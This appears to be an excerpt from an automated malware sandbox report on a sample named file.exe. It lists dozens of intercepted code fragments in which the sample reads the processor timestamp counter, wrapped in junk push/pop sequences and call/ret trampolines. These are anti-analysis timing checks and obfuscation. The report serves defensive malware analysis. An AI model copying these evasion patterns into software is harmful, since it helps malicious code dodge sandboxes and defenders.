                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF2 second address: 7DEC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a js 00007F6C698AAEE6h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC03 second address: 7DEC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E279D second address: 7E27A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3D37 second address: 7E3DB0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6C6956DA48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007F6C6956DA51h 0x0000002a jl 00007F6C6956DA4Ch 0x00000030 ja 00007F6C6956DA46h 0x00000036 pop edi 0x00000037 jmp 00007F6C6956DA4Ah 0x0000003c push 00000000h 0x0000003e and bx, C62Ah 0x00000043 push 00000000h 0x00000045 mov di, 2334h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F6C6956DA53h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2FB3 second address: 7E2FBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3F7E second address: 7E3F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3F83 second address: 7E400C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C698AAEE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F6C698AAEE8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, 02533C02h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov bx, 4124h 0x0000003c mov eax, dword ptr [ebp+122D0339h] 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F6C698AAEE8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c push FFFFFFFFh 0x0000005e cld 0x0000005f nop 0x00000060 jmp 00007F6C698AAEECh 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4EB7 second address: 7E4EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6C6956DA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E400C second address: 7E401D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5E0C second address: 7E5E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4EC2 second address: 7E4F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, di 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F6C698AAEE8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e jo 00007F6C698AAEF9h 0x00000034 jmp 00007F6C698AAEF3h 0x00000039 call 00007F6C698AAEEDh 0x0000003e mov dword ptr [ebp+122D1BD6h], esi 0x00000044 pop ebx 0x00000045 mov edi, dword ptr [ebp+122D3368h] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 sub bx, F9C4h 0x00000057 mov eax, dword ptr [ebp+122D0C25h] 0x0000005d push 00000000h 0x0000005f push eax 0x00000060 call 00007F6C698AAEE8h 0x00000065 pop eax 0x00000066 mov dword ptr [esp+04h], eax 0x0000006a add dword ptr [esp+04h], 0000001Dh 0x00000072 inc eax 0x00000073 push eax 0x00000074 ret 0x00000075 pop eax 0x00000076 ret 0x00000077 push FFFFFFFFh 0x00000079 jmp 00007F6C698AAEEAh 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 jmp 00007F6C698AAEF0h 0x00000087 jp 00007F6C698AAEE6h 0x0000008d popad 0x0000008e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7BF0 second address: 7E7BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5E10 second address: 7E5EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F6C698AAEE8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 pushad 0x00000025 mov cx, B6E5h 0x00000029 jmp 00007F6C698AAEF7h 0x0000002e popad 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr [ebp+122D1ADEh], ebx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov eax, dword ptr [ebp+122D0955h] 0x00000049 jnp 00007F6C698AAF06h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F6C698AAEE8h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b add dword ptr [ebp+12453575h], eax 0x00000071 and di, 9B01h 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 push esi 0x0000007a push edx 0x0000007b pop edx 0x0000007c pop esi 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4F83 second address: 7E4FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6C6956DA58h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7BF6 second address: 7E7C9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6C698AAEE8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+12453E78h], esi 0x0000002c push 00000000h 0x0000002e mov ebx, dword ptr [ebp+1244DB3Ch] 0x00000034 xor bh, 00000007h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F6C698AAEE8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 jmp 00007F6C698AAEF4h 0x00000059 push eax 0x0000005a pushad 0x0000005b jns 00007F6C698AAEF5h 0x00000061 pushad 0x00000062 jmp 00007F6C698AAEEFh 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8B10 second address: 7E8B85 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F6C6956DA48h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6C6956DA48h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov bx, 946Fh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007F6C6956DA50h 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8B85 second address: 7E8B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C698AAEEAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7E58 second address: 7E7E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9BB5 second address: 7E9BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8D26 second address: 7E8D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C6956DA50h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EABBE second address: 7EAC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6C698AAEE6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor bx, 5E1Fh 0x00000014 sbb bh, FFFFFF86h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F6C698AAEE8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 xor edi, 0B4C8413h 0x00000039 push 00000000h 0x0000003b movsx ebx, cx 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 pop edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EAC09 second address: 7EAC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECED9 second address: 7ECEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECEDD second address: 7ECEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECEE3 second address: 7ECEF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C698AAEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDEC8 second address: 7EDF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6C6956DA48h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F6C6956DA48h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 jno 00007F6C6956DA48h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDF24 second address: 7EDF29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDF29 second address: 7EDF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C6956DA56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEF41 second address: 7EEF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F11F4 second address: 7F11FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F11FA second address: 7F1262 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor edi, 29E19A2Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 movsx edi, bx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F6C698AAEE8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a push ecx 0x0000003b mov ebx, dword ptr [ebp+122D2136h] 0x00000041 pop ebx 0x00000042 mov eax, dword ptr [ebp+122D1651h] 0x00000048 mov edi, dword ptr [ebp+122D3947h] 0x0000004e mov edi, 29C06691h 0x00000053 push FFFFFFFFh 0x00000055 jo 00007F6C698AAEE8h 0x0000005b mov bl, 01h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1262 second address: 7F1268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4B5B second address: 7F4B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C698AAEE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4B66 second address: 7F4B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C6956DA4Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8DE6 second address: 7F8DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8738 second address: 7F873E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDD55 second address: 7FDD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C698AAEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDD5F second address: 7FDDC1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 jmp 00007F6C6956DA4Eh 0x0000001d pop ecx 0x0000001e mov eax, dword ptr [eax] 0x00000020 jne 00007F6C6956DA5Bh 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a jbe 00007F6C6956DA64h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6C6956DA52h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDEA7 second address: 7FDEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDFE9 second address: 7FDFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDFEE second address: 7FDFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804329 second address: 804364 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6C6956DA53h 0x00000008 pop ecx 0x00000009 jmp 00007F6C6956DA57h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jne 00007F6C6956DA46h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804364 second address: 804368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804368 second address: 804377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6C6956DA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FB71 second address: 78FB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F1C second address: 802F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA4Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F2F second address: 802F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F33 second address: 802F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F39 second address: 802F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C698AAEF8h 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F6C698AAEEEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F63 second address: 802F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802F6A second address: 802F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80355D second address: 803573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803573 second address: 803577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803577 second address: 803581 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C6956DA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803867 second address: 80386D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803BE4 second address: 803BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D10 second address: 803D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D1F second address: 803D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D23 second address: 803D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D2F second address: 803D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D35 second address: 803D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D39 second address: 803D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D3D second address: 803D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D43 second address: 803D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803E7A second address: 803EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6C698AAEE6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jno 00007F6C698AAEEEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jnp 00007F6C698AAF14h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80402D second address: 804031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804031 second address: 804040 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804040 second address: 804045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041AA second address: 8041DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6C698AAEF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C698AAEF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041DD second address: 8041E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AB38 second address: 80AB43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F6C698AAEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4231 second address: 7D4264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C6956DA57h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4264 second address: 7D427B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
